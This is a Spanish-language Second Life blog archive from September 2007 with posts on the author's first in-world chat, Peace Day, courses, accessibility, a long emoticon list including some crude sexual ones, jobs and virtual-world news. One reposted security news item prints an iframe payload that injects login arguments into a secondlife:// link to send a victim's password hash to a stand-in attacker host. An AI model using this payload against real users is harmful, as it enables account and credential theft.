Mariam Kidd en Second Life: 16.09.07

viernes, 21 de septiembre de 2007

2

Mariam Kidd VI. Mis primeras palabras

Ayer me pasó una cosa muy curiosa, me encontraba en la boda de Amaral Alcott y Xamal Eun. Entre el montón de invitados descubrí un nombre que me sonaba y del que hacía mucho que no sabía, al principio me equivoque, pero sabía que lo conocía de algo y lo recordé... era Yago Welles... yo le decía que era mi padrino y que lo conocí en Mambo, él decía que me había sido mi primer guía y me conocía de secondlifespain. Así que me dijo: espera y miro en el log. Los dos teniamos razón, había contactado con él por mediación de la web de secondlifespain y nuestro primer encuentro fue en Mambo. Era él mi padrino de SL y mi primer guía y fue toda una sorpresa cuando me recordó mis primeras palabras en SL, que ilusión leerlas después de 7 meses de andadura por aquí, fue como eso que dicen, que cuando vas a morir toda tu vida pasa en imágenes rápidas por tu cabeza. Pues así me paso a mí después de leerlas, toda mi SL pasó por mi mente, desde aquella chica con vestidito rojo, con coletas y pecosa que llegó a Mambo (que por cierto, me dijo que había cerrado, que pena, con los buenos momentos que pase allí)
Estas fueron mis primeras palabras, imagino que no os interesan a la mayoría, pero para mi fue el principio y el descubrimiento de un nuevo mundo.
[14:26] Mariam Kidd: hola [14:26] Yago Welles: hola [14:27] Mariam Kidd: he visto tu nombre en la web, soy nueva y ando un poco perdida [14:27] Mariam Kidd: me ayudas? [14:27] Yago Welles: claro [14:27] Yago Welles: dime [14:27] Mariam Kidd: sacame de aqui [14:27] Mariam Kidd: jaja [14:28] Yago Welles: vente a la disco donde estoy [14:28] Mariam Kidd: solo encontre la isla que hablan espaoñl [14:28] Mariam Kidd: me llevas? [14:28] Yago Welles: mira pon en el search MAMBO [14:28] Yago Welles: en places [14:28] Mariam Kidd: ok [14:29] Mariam Kidd: ya he llegado [14:29] Yago Welles: espera q te cargue bien y te me acercas q no te veo [14:30] Mariam Kidd: ok [14:30] Yago Welles: no te veo aun [14:31] Yago Welles: estas en la pista de baile? [14:31] Mariam Kidd: de momento solo veo un carte que pone en alquiler [14:31] Yago Welles: esperate q voy a buscarte [14:31] Mariam Kidd: ok [14:32] Mariam Kidd: ya te veo [14:32] Mariam Kidd: hola [14:32]
Aun no me explico como fui capaz de encontrar el sitio y llegar allí, pero con personas como Yago no hay problemas. Gracias guapo por ayudarme a mi y aun montón de gente más. Fue un placer volver a conversar contigo.
Le conté como me había ido mi vida y todo lo que había aprendido. Por cierto, alguien me puede pasar el video de la boda??? no me enteré de mucho, aunque eso si, no me perdí el intercambio de votos ainsssssssssss que bonito, cuanto se quieren estos chicos, muchas suerte a los dossssssssssssss.
0

Hoy, Día Internacional de La Paz

Hoy se celebra el Día Internacional de la Paz; Este día establecido en el calendario en 1981 por Naciones Unidas como una celebración anual de no violencia y cesación del fuego a nivel mundial. Cada año, muchas personas en todas partes del mundo rinden homenaje a la paz de diversas maneras. Aunque no he logrado averiguar ningún acto programado en SL, pero estoy segura que haberlo haylo. Sino a loro con la respuesta de un amigo al preguntarle si sabia de algún evento programado para hoy en SL "sí, yo hoy voy a hacer el amor y no la guerra, quieres entrevistarme
ó prefieres que echemos el kiki del amor?" jajaja este Fede es unico.
Este año el secretario general de la ONU, Ban Ki-moon, tocará la Campana de la Paz en la sede de Naciones Unidas en Nueva York en compañía de los Mensajeros de la Paz de Naciones Unidas
Aunque siete países del mundo se encuentran en conflictos armados
IRAK. El 20 de marzo de 2003 el ejército americano y aliados invadieron Irak para derrocar a Sadam Husein acusado de tener armamento de destrucción masiva. Desde entonces tienen presencia de tropas extranjeras, luchas entre grupos iraquíes (chiíes, suníes y kurdos) y atentados de Al Qaeda que han causado la muerte de 73.264 iraquíes y unos 4,089 militares (3,791 estadounidenses).
ISRAEL-PALESTINA. El 14 de mayo de 1948 se proclamó el Estado de Israel empezando asi la primera guerra árabe-israelí, entre Gaza y Cisjordania.
ISRAEL-LIBANO. Desde 2006 con un balance de más de 1,000 civiles libaneses muertos y 157 israelíes, en su mayoría militares.
AFGANISTAN.- Desde 2001 que tras los atentados del 11-s en EEUU el régimen talibán afgano se niega a entregar al líder de Al Qaeda, Osama Bin Laden. Sol en 2007 ya han muerto unas 2,000 personas.
DARFUR. Desde 2003 cuando dos grupos rebeldes se alzaron contra el gobierno central de Jartum (islamista), acusado de discriminar a la población negra en favor de la árabe, con un balance de 200,000 vidas y 2.5 millones de desplazados.
COLOMBIA. Desde los setenta se produce el conflicto con la guerrilla de las Fuerzas Armadas Revolucionarias de Colombia (FARC) causando decenas de miles de muertos. Aunque los grupos paramilitares Autodefensas Unidas de Colombia (AUC) han completado su desmovilización, iniciada en 2004.
SOMALIA. Desde enero de 1991 cuando un movimiento militar derrocó al régimen de Siad Barre en enero de 1991 provocando una guerra civil entre grupos étnicos dividiendo el país en múltiples regiones controladas por diferentes líderes somalíes. En 2004 se llegó a un acuerdo entre el Gobierno de transición y el resto de facciones somalíes pero a finales de 2006 se produjo un nuevo estallido de violencia con enfrentamientos entre una alianza de señores de la guerra de Mogadishu y la Unión de Tribunales Islámicos.
Bueno, es difícil terminar con todo esto, pero intentémoslo por lo menos este día, hagamos como nos sugiere Fede, nada de entrevistas, echemos el kiki del amor ;o).

jueves, 20 de septiembre de 2007

0

La asociación espiral ofrece cursos formativos.

El curso será impartido por Bea Marín (Bea Fride en SL) - Espiral Formació UAB - Edifici G - Aula informática 3 - 19 a 21 horas Second Life.
Será un taller presencial de dos horas de duración donde nos enseñaran:
· A dar los primeros pasos en este mundo, la creación del avatar y un primer contacto con SL. Disfrutaremos de una paseo guiado a los de interés educativo.
· Movernos, tocar e interactuar en el marco de una fiesta/disco que ofreceran en la sede Espiral Second Life
· Disponibilidad de dejar nuestros pensamiento en un foro que permanecerá abierto hasta final de año sobre el modelo organizativo del espacio.
Si te pica la curiosidad de participar de esta formación, deja tu nombre y correo electrónico en Comentarios o envíales un correo a: formacion@ciberespiral.net
noticia original http://ciberespiral.net/index.php?option=com_content&task=blogsection&id=7&Itemid=30
0

Acceso para los invidentes en los mundos virtuales.

BBC News publicó el pasado miércoles la noticia en su web. http://news.bbc.co.uk/2/hi/technology/6993739.stm
La compañía IBM ha encontrado ha conseguido un sistema para que los ciegos puedan participar en estos mundos. Un sistema de sonidos diseñado por un grupo de estudiantes irlandeses que logra crear la sensación de espacio. Ha investigado en 'Active Worlds', no tan conocido como SL pero con mas flexibilidad y que también ofrece la posibilidad de crear objetos y edificios.
El sistema lo componen diferentes tipos de voces y sonidos.
Cuando entramos en el mundo se puede escuchar una descripción del lugar asi de los objetos que nos rodean, así que si tenemos cerca una señal de trafico nos avisa para que no nos choquemos, joer con la de golpes que nos damos viendo no me puedo imaginar sin ver, o es que yo soy muy torpe. Así como sonidos asociados a los objetos, si hay un coche lo oiremos funcionar, a un perro labrar, el sonido de las hojas de un árbol, etc...
También hay una herramienta que lee en voz todo lo que se escribe en los chats del juego.
Han creado un sónar para poder saber si se acerca alguien, la dirección por la que viene y la distancia a la que esta de nosotros.
Aparte de demostrar que la idea es factible el equipo de investigadores ha realizado varias recomendaciones de accesibilidad que servirán a los diseñadores para la adaptación de los mundos virtuales.
Según comentó O'Brien de IBM la compañía crea que los mundos virtuales van a ser próximamente la gran evolución en la web y si esto pasa no esta bien que nos olvidemos de los ciegos mientras los demás disfrutamos de ellos.

miércoles, 19 de septiembre de 2007

0

25 años de sonrisas :-)

Según publica hoy el periódico el Mundo, el smiley de la sonrisa cumple hoy un cuarto de siglo.
Nacido un 19 de septiembre de 1982 a las 11:44 de la mañana de manos de Scott E. Fahlman, un profesor de 34 años, de investigación de la Universidad Carnegie Mellon de Pittsburg (Pensilvania).
Su papa en estos días no tiene tiempo para dedicarse a su afición, la inteligencia artificial y sus aplicaciones informáticas. Está abrumado por las llamadas y felicitaciones que recibe en su despacho de Pittsburg.
Este pequeñín ha logrado revolucionar la comunicación no verbal en el ciberespacio, salvando las limitaciones que se tenían en los mensajes de texto para expresar las emociones, evitando así algún que otro enfado o mal entendido.
El alumbramiento de Smiley fue entre comunicados, preguntas científicas y contenidos varios que se intercambian entre el profesorado y alumnado de la universidad. Alguien envió un correo bromeando sobre una supuesta contaminación en un ascensor, que desató un gran debate sobre el límite del humor en la red y cómo marcar los comentarios divertidos para que nadie se los tomara en serio.
Fahlman, envió su respuesta: “propongo la siguiente secuencia de caracteres para los bromistas: :-)” , escribió. “Leedla de lado” , aconsejó a los internautas. En el mismo correo, propuso utilizar :- ( para los mensajes que no son broma. Este símbolo pronto fue utilizado para reflejar tristeza, el enfado o el desagrado.
La propuesta fue acogida con gran entusiasmo entre los alumnos y el Smiley visitó otras universidades y foros.
En pocos meses nacieron nuevos hermanitos“smilies”Creando así un nuevo hobby entre los cibernautas.
Smiley se perdió, aunque no su recuerdo, hasta que unos compañeros de su padre lo encontraron hace 5 años, justo a tiempo para celebrar su 20 cumpleaños
Fahlman nunca recibió dinero por su invento, utilizado cada día por millones de internautas. Pero él dice que: “es mi pequeño regalo para el mundo”.
La Familia y uno más:

:-) Sonrisa genérica, simpatía, felicidad
:-( Tristeza, pena, disgusto
:-D Hablar con una sonrisa / una risa
:-))) Muchas sonrisas
:-((( Muy triste, profunamente apenado
:-DDD Muchas risas
X-D Tronchado de risa
:-o Sorpresa
:-O Sorpresa mayor
:-| Inexpresivo, cara de póquer
;-) Guiño (complicidad)
:-x Besando
:*) Recibiendo besos en la mejilla
:-* Recibiendo besos en los morros
:-@ Gritando
?:-( Dudando, indeciso
:-/ Mosqueado o escéptico
|-O Aburrido (bostezo)
:-I Pensando / Indiferente
:-# Censurado (no puedo hablar)
:----) Mentiroso (Pinocho)
:-c Realmente triste, disgustado
>:-) Sonrisa diabólica, malintecionada
}:-) Irónico / Picarón
:,( Llorando, una lagrimita
:,,,( Llorando más
&.(.. Llorando, otra forma
:'-) Otro que llora, pero de felicidad
:-> Sarcástico
#-) ciego feliz (¿mucha juerga?)
%-) Mareado, pero también feliz
%-( ¿Demasiado tiempo frente al ordenador?
O:-) Santo / Inocente
69:-) Pensando en el sexo
>-\ Cabreado, furioso
:-|K- Poniéndose formal (serio y corbata)
[:-] Muy rígido, estricto (cabeza cuadrada)
<:-) Tontorrón, locuelo
:-& Incoherente (con la lengua hecha un lío)
$-) Obsesionado por el dinero (le tocó la lotería)
$-( ¿Haciendo la declaración de la renta?
Acciones / estados físicos
|-) Dormido
|-o Roncando
:-} Despues de beber un buen vino
:#) Sonrisa de borracho
%#} Muy borracho, mareado
:~i Fumando
:-7 Fumando en pipa
:/i No fumo (o no-fumar)
:-~) Resfriado, moqueando
:-" Silvando
:-9 Relamiéndose
:-b Sacando la lengua
(:-$ Enfermo
Atributos físicos
O-> Hombre
O+ Mujer
(-: Zurdo
.-( Tuerto
P-) Tuerto con parche (pirata)
:_) Con desviación del tabique nasal
&:-) De pelo rizado
=:-) Pelo en cresta, tal vez sea un punky
=:-( Los punkys verdaderos nunca sonríen
~~:-) Peinado sofisticado
#:-) Peinado yuppy
:-(=) Con muchos piños, dentón
:-=) Con mostacho, bigote corto
:-{) Bigote más largo
:<)= Con otro bigote, y barba
:+) Narizotas genérico
:>) Narizotas aguileño
:c) Narizotas respingón
:-)8 Maziza, pechugona
(:I) Carahuevo
:-{} De labios gruesos
(:-) Calvo
5:-) Con tupé (Elvis Presley)
:%) Con acné
:-(#) Con aparato corrector dental
C:-) Con gran capacidad cerebral
:) Niño sonriente
:( Niño triste
:D Niño riendo
:-: Un mutante
Profesiones / personajes
_D-) Submarinista (con tubo y gafas)
:?) Filósofo

*:o) Payaso
+-:-) Sacerdote, religioso o similar
-=#:-) Mago
8=:-) Chef, cocinero
+]:-) Enfermera
+<:-) Monja
(>-:-) Paracaidista
=:-H Jugador de rugby
:-)-S=(4- Bailarina (de ballet)
:-)>\ Un tuno (de la tuna universitaria)
Q:-) Recién graduado
*!#&:-) Loco de remate
X-( Fallecido
(-::-) Hermanos siameses
-:-) Indio
:)|< Enano o niño
<|-) Chino
Hombre invisible
:-[ Vampiro
]:-> El diablo
>:) Diablillo
[:| Robot
[=|:^)(***)( ) Muñeco de nieve
O-) Cíclope
[:-*( Adolfo Hitler
C|:-= Charlie Chaplin
:-.) Madonna
?;-7 Ace Ventura (semiperfil)
=|:-)= El tío Sam
****:-) Margie Simpson
([( Robocop
Accesorios / vestimenta
8-) Con gafas
::-) Cuatro ojos (gafas)
B-) Otro con gafas
B:-) Con las gafas en la cabeza
{:-) Con peluquín (o con raya al medio)
*<:-) Con gorro de fiesta
[:-) Con auriculares (walkman)
:-)X Con pajarita (elegante)
d:-) Con sombrero de hongo (inglés elegante)
@:-) Con turbante
8:-) Niña con lazo
Sexuales
:- Varón
>- Hembra
:-) :-... Orinando (adivina el sexo)
:-) -: Una erección
:-( :- Impotente
:-) o===8 Erección mayor
o=m=8 Masturbación
:-O<==8 Sexo oral
:-)8-o< Mujer "dispuesta"
:-+<-: Haciendo el amor
:-| 8( )- Mujer embarazada
Animales
:@) Cerdo
:8) Otro cerdo
8) Rana
3:o[ Perro
3:o[0r Perro San Bernardo, con barrilito
3:-o Vaca
38-b~ Vaca loca (inglesa)
+3:-o Vaca sagrada (india)
}:-o Toro
]:-:) Caballo
3:*> Reno
:~~~~~ Serpiente
:-\/\/\/\-Oo Otra serpiente, ¡de cascabel!
) Gato de Cheshire
Otros
@>-->--- Una rosa
c==(==O=) Una guitarra (¿cantamos?)
Perfiles (imágenes vistas de perfil)
.'J Sonriendo
.'v Hablando
.'w Hablando con lengua de víbora
.'V Gritando
.'U Bostezo
.'P Sacando la lengua
Sin girar la imagen
(~_o) Guiño
(.)(.) Tetas
( o ) ( o ) Tetones
>-^);> Pez
\=/ Una bebida
0

El Campus de la Justicia de la Comunidad de Madrid en SL

Fuente: LaFlecha (Diario de Ciencia y Tecnología)
El Campus de la Justicia de la Comunidad de Madrid será recreado por METAVERSE, (empresa dedicada al desarrollo de proyectos en SL) destacándose como el proyecto más importante desarrollado en España dentro de SL hasta ahora.
El proyecto se presentó la semana pasada en una rueda de prensa ofrecida por la Consejería de Justicia y Administraciones Públicas, destacando como objetivo principal la creación de un nuevo canal de comunicación entre los ciudadanos y el cuerpo de funcionarios de justicia con un acceso gratuito para cualquier persona de cualquier rincón del mundo.
Se encargarán de su diseño renombrados arquitectos y urbanistas de todo el mundo.
Podremos conocerlo y visitarlo de una manera virtual. Gracias al amplio abanico que nos ofrece este nuevo mundo virtual podemos asistir a conferencias, reuniones, tutorías, ruedas e prensas...y recibir formación sin movernos de nuestro pc de casa. Gracias al video en pantallas virtuales y el audio, tanto para escuchar como para mantener conversaciones con todos los participantes de las actividades programadas.
Según las palabras del equipo de METAVERSE: "Desde METAVERSE somos conscientes del potencial de Second Life y asesoramos a las empresas en su estrategia de optimización máxima de esta tecnología desarrollando las herramientas necesarias para implementar los proyectos", señala Ion Otazua, responsable de desarrollo de METAVERSE.

martes, 18 de septiembre de 2007

0

Ofertas de Empleo

PxStudio empresa de publicidad en Second Life busca:

*Personal bilingüe, ingles- español (a poder ser ingles primera lengua) para hacer traducciones.

*25 ejecutivos de ventas. Formanción a cargo de la empresa, posibilidad de promoción y sueldo a comisiones.

Interesados IM Mariam Kidd.

lunes, 17 de septiembre de 2007

0

Y hablando de robos jejeje

Un amigo me ha hecho una sugerencia por si alguien se siente ofendido.Bueno, algunos de mis post han sido extraídos de noticias o otros blogs, si alguno se siente como que le he robado o ultrajado, me lo diga y será mencionado.
El algunos si que he puesto la fuente pero en otros, bueno que decir a los que me conozcan, se me ha ido la pinza. Así que lo dicho, quien se sienta mal que me lo diga, que sus sentimientos malignos serán atendidos. Que entre todos seguimos informando de una forma o otra.
Y como esto queda un poco soso, os deleito con algo que alguien me dijo un día cuando le pregunte que quien era. Lo siento chi@s pero no voy a revelar la fuente, se dice el pecado pero no el pecador. Para el autor: si te sientes mal por mencionar tus palabras y no tu identidad dímelo que te quitaré todas tus penas jajaja.

"Alguien que da todo lo que tiene por una sonrisa...
alguien que puede llegar a amar mas que a si mismo...
alguien con una mansión en su corazón esperando por un princesa para que la habite....
alguien que respeta... que conoce sus limites....
que tiene sus ideas claras y sus metas.... y que no se detiene por nada para conseguirlas... alguien que te hará verdaderamente feliz...
capaz de ir al monte Everest a tomar una estrella y colocarla en un anillo....
montarme en un satélite para amarrar la luna a tu ventana
y hasta quemarme las manos para traerte el sol cuando necesites calor...."
0

Robo de identidades en Second Life mediante Explorer

KRIPTÓPOLIS
Según acaba de publicar GNU Citizen (y confirma Sergio Maone, creador de NoScript), nuestro viejo amigo el bug "compartido" (sí, ése sobre el que un preclaro MVP de Microsoft asegura que esta empresa no tiene ninguna responsabilidad) permite que te roben impunemente tu "existencia" en Second Life, un mundo virtual... donde también se hacen negocios reales.
Tan sencillo como hacer que la víctima visite con Explorer una página maliciosa con el siguiente contenido:
((iframe src='secondlife://" -autologin -loginuri "http://web.atacante.com/sl/record-login.php'>
/iframe>))
Se provoca así el arranque del cliente de Second Life, que intenta loguearse automáticamente en la web del atacante. Un script situado en ésta recoge el hash MD5 de la contraseña, que puede ser utilizado directamente para loguearse, o bien pasarse por unas rainbow tables para extraer la contraseña en claro...
Maone lamenta (quizás irónicamente) que esta vez, al tratarse de Explorer, NoScript no pueda protegernos.
0

HBO Televisará la primera película hecha en SL

HBO, la cadena de televisión premium de cine de Time Warner, anunció que ha pagado una cantidad de seis cifras por los derechos de emisión de la primera película hecha en Second Life. El director, Douglas Gayeton, Molotov Alta en Second Life.
La película titulada “My Second Life: The video diaries of Molotov Alta” consta de siete episodios. En cada uno se reflejará un aspecto de la cultura del mundo virtual, según HBO.
En el último año, decenas de empresas se han unido al mundo virtual para promoción y presencia corporativa, y Hollywood se ha interesado por el mundo virtual, usando SL para hacer un estudio de grabación virtual. Este proceso se llama machinima.
Más información sobre esta peli http://nwn.blogs.com/nwn/2007/09/second-life-mac.html#more. Está en ingles
0

Two Gardens Between Us/Dos Jardines Entre Nosotros

Mundo Second Life.
El Ayuntamiento de Madrid (España) y la Fundación Astroc invitan a todos los avatares a participar en el proyecto "Jardines Sonoros" que se celebra durante la Noche en Blanco de la cultura. El sábado 22 de septiembre, se inaugura en Second Life y en el espacio real la obra "Two Gardens Between Us/Dos Jardines Entre Nosotros" de Mario-Paul Martínez. Desde las 21 h hasta las 03 h (hora española) el jardín situado en Quest I, "Jardín virtual" (180, 189, 28) intercambiará experiencias sonoras y visuales con su referente en la realidad: El jardín de la Fundación Astroc del Paseo de la Castellana en Madrid. Durante estas horas, ambos estadios del conocimiento convivirán interconectados mediante el principio elemental del proyecto "Jardines Sonoros": El sonido. Y el público viandante, avatar y humano, podrá disfrutar de estos acontecimientos en directo a través de filmaciones y pantallas situados a ambos lados de la realidad, mientras pasea rodeado por las resonancias del otro mundo. Se trata de someter la experiencia de inmersión virtual que supone "Second Life" a la palpable pulsión de la realidad, estableciendo un puente comunicativo entre los sonidos e imágenes remotos alojados en la virtualidad y los ecos de la realidad producidos por los visitantes que acudan al jardín. Una serie de micrófonos y webcams capturarán las resonancias que estos emitan y las trasvasarán al universo virtual. Y viceversa; mientras en "Second Life" el usuario experimenta las sensaciones desprendidas en la parcela de la realidad, las impresiones audiovisuales provocadas en la virtualidad se emitirán en el jardín real. Tal conexión se llevará a cabo con pantallas de apoyo que emitirán lo que ocurre en ambas dimensiones. En el jardín de la realidad se contará con dos pantallas de gran tamaño, equivalentes a las situadas en su reflejo de "Second Life", que mostrarán lo que ocurre en el universo virtual. De este modo, podremos observar a los avatares -así se llaman los personajes que se utilizan como alter-ego virtual- llegados de todas partes de la Red, observando el jardín y contemplando a su vez aquello que ocurre en la realidad gracias a las pantallas que ellos también dispondrán en el emplazamiento virtual. Localización del jardín virtual: Quest I, Jardín virtual (180, 189, 28) Localización del jardín real: Jardín de la Fundación Astroc Paseo de la Castellana 53 Madrid. Horario de la obra: Sábado 22 de septiembre de 21h a 03h (horario español)